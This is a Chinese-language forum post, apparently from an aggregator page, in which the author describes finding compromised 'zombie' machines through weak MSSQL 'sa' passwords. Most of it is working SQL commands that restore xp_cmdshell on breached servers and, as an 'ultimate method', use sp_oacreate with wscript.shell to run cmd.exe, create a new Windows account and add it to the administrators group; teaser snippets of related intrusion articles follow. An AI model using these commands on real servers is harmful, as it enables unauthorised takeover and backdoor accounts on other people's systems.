我自己現在找肉雞主要是找sa弱口令肉雞到還能找到幾隻,但也碰到不少困難,到處查資料總算找到點有用的。
下面這些命令要sql分離器才能實現,下面是一些關於sa弱口令相關命令。
一.更改sa口令方法:
二.簡單修補sa弱口令:
方法1:查詢分離器連線後執行:
if exists (select * from
dbo.sysobjects where id = object_id(n'[dbo].[xp_cmdshell]') and
objectproperty(id, n'i***tendedproc') = 1)
exec sp_dropextendedproc n'[dbo].[xp_cmdshell]'
go然後按f5鍵命令執行完畢。
方法2:查詢分離器連線後
第一步執行:use master,
第二步執行:sp_dropextendedproc 'xp_cmdshell',
然後按f5鍵命令執行完畢。
三.常見情況恢復執行xp_cmdshell:
1 未能找到儲存過程'master..xpcmdshell'。
恢復方法:查詢分離器連線後,
第一步執行:exec sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int,
第二步執行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll',
然後按f5鍵命令執行完畢。
2 無法裝載 dll xpsql70.dll 或該dll所引用的某一dll。原因126(找不到指定模組。)
恢復方法:查詢分離器連線後,
第一步執行:sp_dropextendedproc "xp_cmdshell",
第二步執行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
然後按f5鍵命令執行完畢。
3 無法在庫 xpweb70.dll 中找到函式 xp_cmdshell。原因: 127(找不到指定的程式。)
恢復方法:查詢分離器連線後,
第一步執行:exec sp_dropextendedproc 'xp_cmdshell'
第二步執行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
然後按f5鍵命令執行完畢。
四.終極方法:
如果以上方法均不可恢復,請嘗試用下面的辦法直接新增帳戶:
查詢分離器連線後,
2000servser系統:
declare @shell int exec sp_oacreate 'wscript.shell',@shell output
exec sp_oamethod @shell,'run',null,'c:/winnt/system32/cmd.exe /c net user 新使用者 密碼 /add'
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod
@shell,'run',null,'c:/winnt/system32/cmd.exe /c net localgroup administrators 新使用者 /add'
xp或2003server系統:
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod
@shell,'run',null,'c:/windows/system32/cmd.exe /c net user 新使用者 密碼 /add'
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod
@shell,'run',null,'c:/windows/system32/cmd.exe /c net localgroup administrators 新使用者 /add'
其實還有其它辦法只要你掃到sa弱口令發現執行不了dos命令基本上是他的乙個擴充套件儲存給刪了,只要給他上傳乙個到system32下基本上可以解決。只是這個我還沒認真研究。
利用SA弱口令入侵windows伺服器
mssql中儲存過程分為三種,系統提供的儲存過程,使用者自定義的儲存過程和擴充套件儲存過程。系統提供的儲存過程是在安裝sqlserver時建立的儲存過程,名字以 sp 開頭。使用者定義的儲存過程是用sqlserver的使用者編寫的儲存過程。擴充套件儲存過程則是對動態鏈結庫 dll 函式的呼叫,主要是...
sql弱口令入侵
sql弱口令入侵 mssql伺服器sa使用者弱口令入侵是及其經典的一種黑客入侵手法 其成名是在中美黑客大戰的時候,我們的前輩利用它入侵了很多美國鬼 子的伺服器。下面我介紹一下這種入侵的詳細情況。基礎知識 我們在安裝mssql伺服器之後,系統會有個預設的帳號sa 而這個帳號預設又是空密碼。最要命的是這...
入侵感知系列之弱口令檢測思路
弱口令檢測 背景 在安全方面弱口令問題算是技術含量最低的安全隱患了。但往往技術含量越低,被利用頻率也越高,而且造成的影響還不見得小。所以治理弱口令將成為安全體系建設中價效比最高的乙個環節。但是就是這樣乙個價效比高的環節想完全杜絕卻不是那麼容易,未來的系統可以通過註冊申請環節強制設定強密碼,但是針對過...